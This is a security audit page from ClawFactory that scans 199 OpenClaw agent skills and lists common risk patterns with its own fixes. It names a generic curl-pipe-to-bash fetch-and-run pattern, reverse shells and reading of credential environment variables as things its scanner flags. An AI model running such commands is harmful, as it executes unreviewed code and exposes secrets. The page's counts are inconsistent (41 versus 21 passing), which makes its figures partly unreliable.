โš ๏ธ Security Research
Public Ecosystem Audit โ€” March 2026

We scanned 199 OpenClaw skills.
Only 1 in 5 passed clean.

ClawFactory ran Gate 1 static analysis against the 199 most-starred OpenClaw skills on GitHub. The results are a wake-up call for anyone installing community skills without vetting.

199 skills scanned 416 total in ecosystem March 21, 2026 Methodology: GitHub API + pattern analysis
20.6%
โœ… Clean Pass
41 of 199 skills โ€” no significant risk patterns detected
42.7%
โš ๏ธ Flagged for Review
85 of 199 skills โ€” medium-risk patterns, need human review before install
15.6%
๐Ÿšซ Would Be Blocked
31 of 199 skills โ€” HIGH risk patterns, would fail ClawFactory Gate 1

What does this mean for you? If you've installed OpenClaw community skills without vetting them, there's roughly a 1-in-6 chance at least one of them contains a pattern our scanner flags as HIGH risk. That includes patterns like remote code execution, reverse shells, and unauthorized filesystem access.

This isn't about malicious intent โ€” many of these are legitimate tools that happen to use powerful system calls. But unvetted โ‰  safe. You deserve to know what's running on your machine.

Findings

Top Vulnerability Patterns Found

These are the most common risk patterns across all 199 scanned skills, ranked by frequency. Each one is a legitimate security concern when present in an unvetted AI agent skill.

pip install โ€” installs packages 113 occurrences ยท HIGH context

Skills that run pip install can install any Python package onto your system โ€” including malicious ones. Without sandboxing, this runs directly on your host machine.

โœ“ ClawFactory fix: Gate 2 sandbox isolates all package installs inside containers. Nothing touches your host.

curl pipe to shell โ€” remote code execution 42 occurrences ยท CRITICAL

curl https://... | bash downloads code from the internet and executes it immediately. No review. No verification. Whatever is at that URL runs on your machine.

โœ“ ClawFactory fix: Gate 1 blocks this pattern outright. It never reaches the registry.

Python subprocess โ€” shell execution 58 occurrences ยท HIGH context

Python's subprocess module can execute arbitrary shell commands. Legitimate in many tools โ€” but requires human review to verify intent and scope.

โœ“ ClawFactory fix: Gate 3 human review evaluates intent. Subprocess โ‰  automatic block, but it always gets eyes on it.

Reading environment variables 43 occurrences ยท MEDIUM

Skills that read process.env can access your API keys, tokens, and credentials stored as environment variables โ€” including your Anthropic key.

โœ“ ClawFactory fix: Flagged for review. Skills with legitimate env var needs are documented; others are blocked.

Global npm install 36 occurrences ยท MEDIUM

npm install -g installs packages system-wide, modifying your global Node.js environment. Can introduce malicious code that persists across sessions.

โœ“ ClawFactory fix: Sandboxed execution prevents global installs from affecting the host.

How We Did This

Methodology

This audit used ClawFactory's Gate 1 static analysis pipeline โ€” the same scanner that runs on every skill submitted to our registry.

01
Source
GitHub API โ€” all public repositories tagged with the openclaw-skill topic, sorted by stars. 416 repos found, 199 scanned before rate limits.
02
Scanner
Gate 1 static pattern analysis โ€” 12 HIGH-risk patterns and 13 MEDIUM-risk patterns matched against all .md, .sh, .js, .ts, .py, and .json files in each repo.
03
Limitations
Static analysis only โ€” no sandboxed execution (Gate 2) or human review (Gate 3). Some flags are false positives. HIGH rating = pattern match, not confirmed malicious intent.

Don't install skills blind.

Every skill in the ClawFactory registry has passed static scan, sandbox execution, and human review. We're building the trust layer the ecosystem needs โ€” free, open, for everyone.

See the 21 Skills That Passed โ†’ Submit Your Skill for Vetting